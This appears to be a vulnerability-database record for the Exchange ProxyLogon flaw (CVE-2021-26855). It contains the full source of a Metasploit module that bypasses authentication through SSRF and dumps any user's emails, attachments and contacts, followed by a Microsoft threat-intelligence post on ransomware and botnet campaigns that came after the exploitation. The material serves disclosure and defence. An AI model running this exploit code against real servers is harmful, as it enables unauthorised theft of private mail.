By taking advantage of this vulnerability, it is possible to dump all mailboxes (emails, attachments, contacts, ...). This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-09T19:52:01", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon Collector", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-02-23T22:27:12", "id": "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "href": "https://www.rapid7.com/db/modules/auxiliary/gather/exchange_proxylogon_collector/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# begin auxiliary class\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' 
=> 'Microsoft Exchange ProxyLogon Collector',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication and impersonating as the\n admin (CVE-2021-26855).\n\n By taking advantage of this vulnerability, it is possible to dump all\n mailboxes (emails, attachments, contacts, ...).\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'GreyOrder', # PoC (https://github.com/GreyOrder)\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author independent researcher (work at Zeop Entreprise)\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/'],\n ['URL', 'https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/distinguishedfolderid'],\n ['URL', 'https://github.com/3gstudent/Homework-of-Python/blob/master/ewsManage.py']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Actions' => [\n [\n 'Dump (Contacts)', {\n 'Description' => 'Dump user contacts from exchange server',\n 'id_attribute' => 'contacts'\n }\n ],\n [\n 'Dump (Emails)', {\n 'Description' => 'Dump user emails from exchange server'\n }\n ]\n ],\n 'DefaultAction' => 'Dump (Emails)',\n 'Notes' => {\n 'AKA' => ['ProxyLogon'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptBool.new('ATTACHMENTS', [true, 'Dump documents attached to an email', true]),\n 
OptString.new('EMAIL', [true, 'The email account what you want dump']),\n OptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check (only).', 'POST', ['GET', 'POST']]),\n OptString.new('TARGET', [false, 'Force the name of the internal Exchange server targeted'])\n ])\n\n register_advanced_options([\n OptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 2147483647])\n ])\n end\n\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\n\n def dump_contacts(server_name)\n ssrf = \"#{server_name}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\"\n\n response = send_xml('POST', ssrf, soap_countitems(action['id_attribute']))\n if response.body =~ /Success/\n print_good(\"Successfuly connected to: #{action['id_attribute']}\")\n xml = Nokogiri::XML.parse(response.body)\n\n folder_id = xml.at_xpath('//t:ContactsFolder/t:FolderId', XMLNS)&.values&.at(0)\n print_status(\"Selected folder: #{action['id_attribute']} (#{folder_id})\")\n\n total_count = xml.at_xpath('//t:ContactsFolder/t:TotalCount', XMLNS)&.content\n print_status(\"Number of contact found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\"Number of contact recalculated due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n\n response = send_xml('POST', ssrf, soap_listitems(action['id_attribute'], total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n print_status(message(\"Processing dump of #{total_count} items\"))\n data = xml.xpath('//t:Items/t:Contact', XMLNS)\n if data.empty?\n print_status('The user has no contacts')\n else\n write_loot(\"#{datastore['EMAIL']}_#{action['id_attribute']}\", data.to_s)\n end\n end\n end\n\n def dump_emails(server_name)\n ssrf = \"#{server_name}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\"\n\n response = send_xml('POST', ssrf, 
soap_countitems(datastore['FOLDER']))\n if response.body =~ /Success/\n print_good(\"Successfuly connected to: #{datastore['FOLDER']}\")\n xml = Nokogiri::XML.parse(response.body)\n\n folder_id = xml.at_xpath('//t:Folder/t:FolderId', XMLNS)&.values&.at(0)\n print_status(\"Selected folder: #{datastore['FOLDER']} (#{folder_id})\")\n\n total_count = xml.at_xpath('//t:Folder/t:TotalCount', XMLNS)&.content\n print_status(\"Number of email found: #{total_count}\")\n\n if total_count.to_i > datastore['MaxEntries']\n print_warning(\"Number of email recalculated due to max entries: #{datastore['MaxEntries']}\")\n total_count = datastore['MaxEntries'].to_s\n end\n\n print_status(message(\"Processing dump of #{total_count} items\"))\n download_items(total_count, ssrf)\n end\n end\n\n def download_attachments(item_id, ssrf)\n response = send_xml('POST', ssrf, soap_listattachments(item_id))\n xml = Nokogiri::XML.parse(response.body)\n\n xml.xpath('//t:Message/t:Attachments/t:FileAttachment', XMLNS).each do |item|\n item_id = item.at_xpath('./t:AttachmentId', XMLNS)&.values&.at(0)\n\n response = send_xml('POST', ssrf, soap_downattachment(item_id))\n data = Nokogiri::XML.parse(response.body)\n\n filename = data.at_xpath('//t:FileAttachment/t:Name', XMLNS)&.content\n ctype = data.at_xpath('//t:FileAttachment/t:ContentType', XMLNS)&.content\n content = data.at_xpath('//t:FileAttachment/t:Content', XMLNS)&.content\n\n print_status(\" -> attachment: #{item_id} (#(unknown))\")\n write_loot(\"#{datastore['EMAIL']}_#{datastore['FOLDER']}\", Rex::Text.decode_base64(content), filename, ctype)\n end\n end\n\n def download_items(total_count, ssrf)\n response = send_xml('POST', ssrf, soap_listitems(datastore['FOLDER'], total_count))\n xml = Nokogiri::XML.parse(response.body)\n\n xml.xpath('//t:Items/t:Message', XMLNS).each do |item|\n item_info = item.at_xpath('./t:ItemId', XMLNS)&.values\n next if item_info.nil?\n\n print_status(\"Download item: #{item_info[1]}\")\n\n response = 
send_xml('POST', ssrf, soap_downitem(item_info[0], item_info[1]))\n data = Nokogiri::XML.parse(response.body)\n\n email = data.at_xpath('//t:Message/t:MimeContent', XMLNS)&.content\n write_loot(\"#{datastore['EMAIL']}_#{datastore['FOLDER']}\", Rex::Text.decode_base64(email))\n\n attachments = item.at_xpath('./t:HasAttachments', XMLNS)&.content\n if datastore['ATTACHMENTS'] && attachments == 'true'\n download_attachments(item_info[0], ssrf)\n end\n print_status\n end\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_xml('POST', \"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\", soap_autodiscover)\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.empty?\n\n server = ''\n owa_urls = []\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n\n next unless type == 'WEB'\n\n item.xpath('./xmlns:Internal/xmlns:OWAUrl', xmlns).each do |owa_url|\n owa_urls << owa_url.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? 
|| server.empty?\n fail_with(Failure::NotFound, 'No \\'OWAUrl\\' was found') if owa_urls.empty?\n\n return([server, legacy_dn, owa_urls])\n end\n\n def send_http(method, ssrf, data: '', ctype: 'application/x-www-form-urlencoded')\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'cookie' => \"X-BEResource=#{ssrf};\",\n 'ctype' => ctype\n }\n request = request.merge({ 'data' => data }) unless data.empty?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def send_xml(method, ssrf, data, ctype: 'text/xml; charset=utf-8')\n send_http(method, ssrf, data: data, ctype: ctype)\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL']}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def soap_countitems(folder_id)\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>Default</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"#{folder_id}\">\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_listattachments(item_id)\n <<~SOAP\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n 
xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:AdditionalProperties>\n <t:FieldURI FieldURI=\"item:Attachments\" />\n </t:AdditionalProperties>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{item_id}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_listitems(folder_id, max_entries)\n <<~SOAP\n <?xml version='1.0' encoding='utf-8'?>\n <soap:Envelope\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\n <soap:Body>\n <m:FindItem Traversal='Shallow'>\n <m:ItemShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:ItemShape>\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\n <m:ParentFolderIds>\n <t:DistinguishedFolderId Id='#{folder_id}'>\n <t:Mailbox>\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:ParentFolderIds>\n </m:FindItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_downattachment(item_id)\n <<~SOAP\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetAttachment>\n <m:AttachmentIds>\n <t:AttachmentId Id=\"#{item_id}\" />\n </m:AttachmentIds>\n </m:GetAttachment>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def soap_downitem(id, change_key)\n <<~SOAP\n <?xml version=\"1.0\" 
encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetItem>\n <m:ItemShape>\n <t:BaseShape>IdOnly</t:BaseShape>\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\n </m:ItemShape>\n <m:ItemIds>\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\n </m:ItemIds>\n </m:GetItem>\n </soap:Body>\n </soap:Envelope>\n SOAP\n end\n\n def write_loot(type, data, name = '', ctype = 'text/plain')\n loot_path = store_loot(type, ctype, datastore['RHOSTS'], data, name, '')\n print_good(\"File saved to #{loot_path}\")\n end\n\n def run\n @proto = (ssl ? 'https' : 'http')\n @random_uri = normalize_uri('ecp', \"#{Rex::Text.rand_text_alpha(1..3)}.js\")\n\n print_status(message('Attempt to exploit for CVE-2021-26855'))\n\n # request for internal server name.\n response = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\")\n if response.code != 500 || !response.headers.to_s.include?('X-FEServer')\n fail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found')\n end\n server_name = response.headers['X-FEServer']\n print_status(\"Internal server name (#{server_name})\")\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn, owa_urls = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n print_status(\"Internal target(s): #{owa_urls.join(', ')}\")\n\n # selecting target\n print_status(message('Selecting the first internal server to respond'))\n if datastore['TARGET'].nil? 
|| datastore['TARGET'].empty?\n target = ''\n owa_urls.each do |url|\n host = url.split('://')[1].split('.')[0].downcase\n next unless host != server_name.downcase\n\n response = send_http('GET', \"#{host}/EWS/Exchange.asmx?a=~#{random_ssrf_id}\")\n next unless response.code == 200\n\n target = host\n print_good(\"Targeting internal: #{url}\")\n\n break\n end\n fail_with(Failure::NotFound, 'No internal target was found') if target.empty?\n else\n target = datastore['TARGET']\n print_good(\"Targeting internal forced to: #{target}\")\n end\n\n # run action\n case action.name\n when /Dump \\(Contacts\\)/\n print_status(message(\"Attempt to dump contacts for <#{datastore['EMAIL']}>\"))\n dump_contacts(target)\n when /Dump \\(Emails\\)/\n print_status(message(\"Attempt to dump emails for <#{datastore['EMAIL']}>\"))\n dump_emails(target)\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/exchange_proxylogon_collector.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2021-03-26T05:16:59", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. 
As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. 
We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks, we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. 
Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. 
For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. 
The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. **As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. 
On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dropped the xx.bat file (in this instance, a version of Chopper):\n\n\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. 
In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n\n\n_Figure 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and WMI event subscriptions for persistence. 
A second script is downloaded to attempt to evade Microsoft Defender Antivirus; the operators abuse their administrative access to run the _Set-MpPreference_ cmdlet to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and to add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n\n\n\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n\n\n_Figure 10. Email subjects of possibly malicious emails_\n\n\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system by a method that does not rely on a web shell, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. 
This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n\n\n_Figure 12. Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. 
The highly privileged credentials gained from an Exchange system are likely to include domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched, and could even re-enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n\n\n_Figure 14. PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain and attempts to spread the payload throughout the network, first over WMI using Invoke-WmiMethod to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations, such as having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n\n\n_Figure 15. Pydomer ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor, which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. 
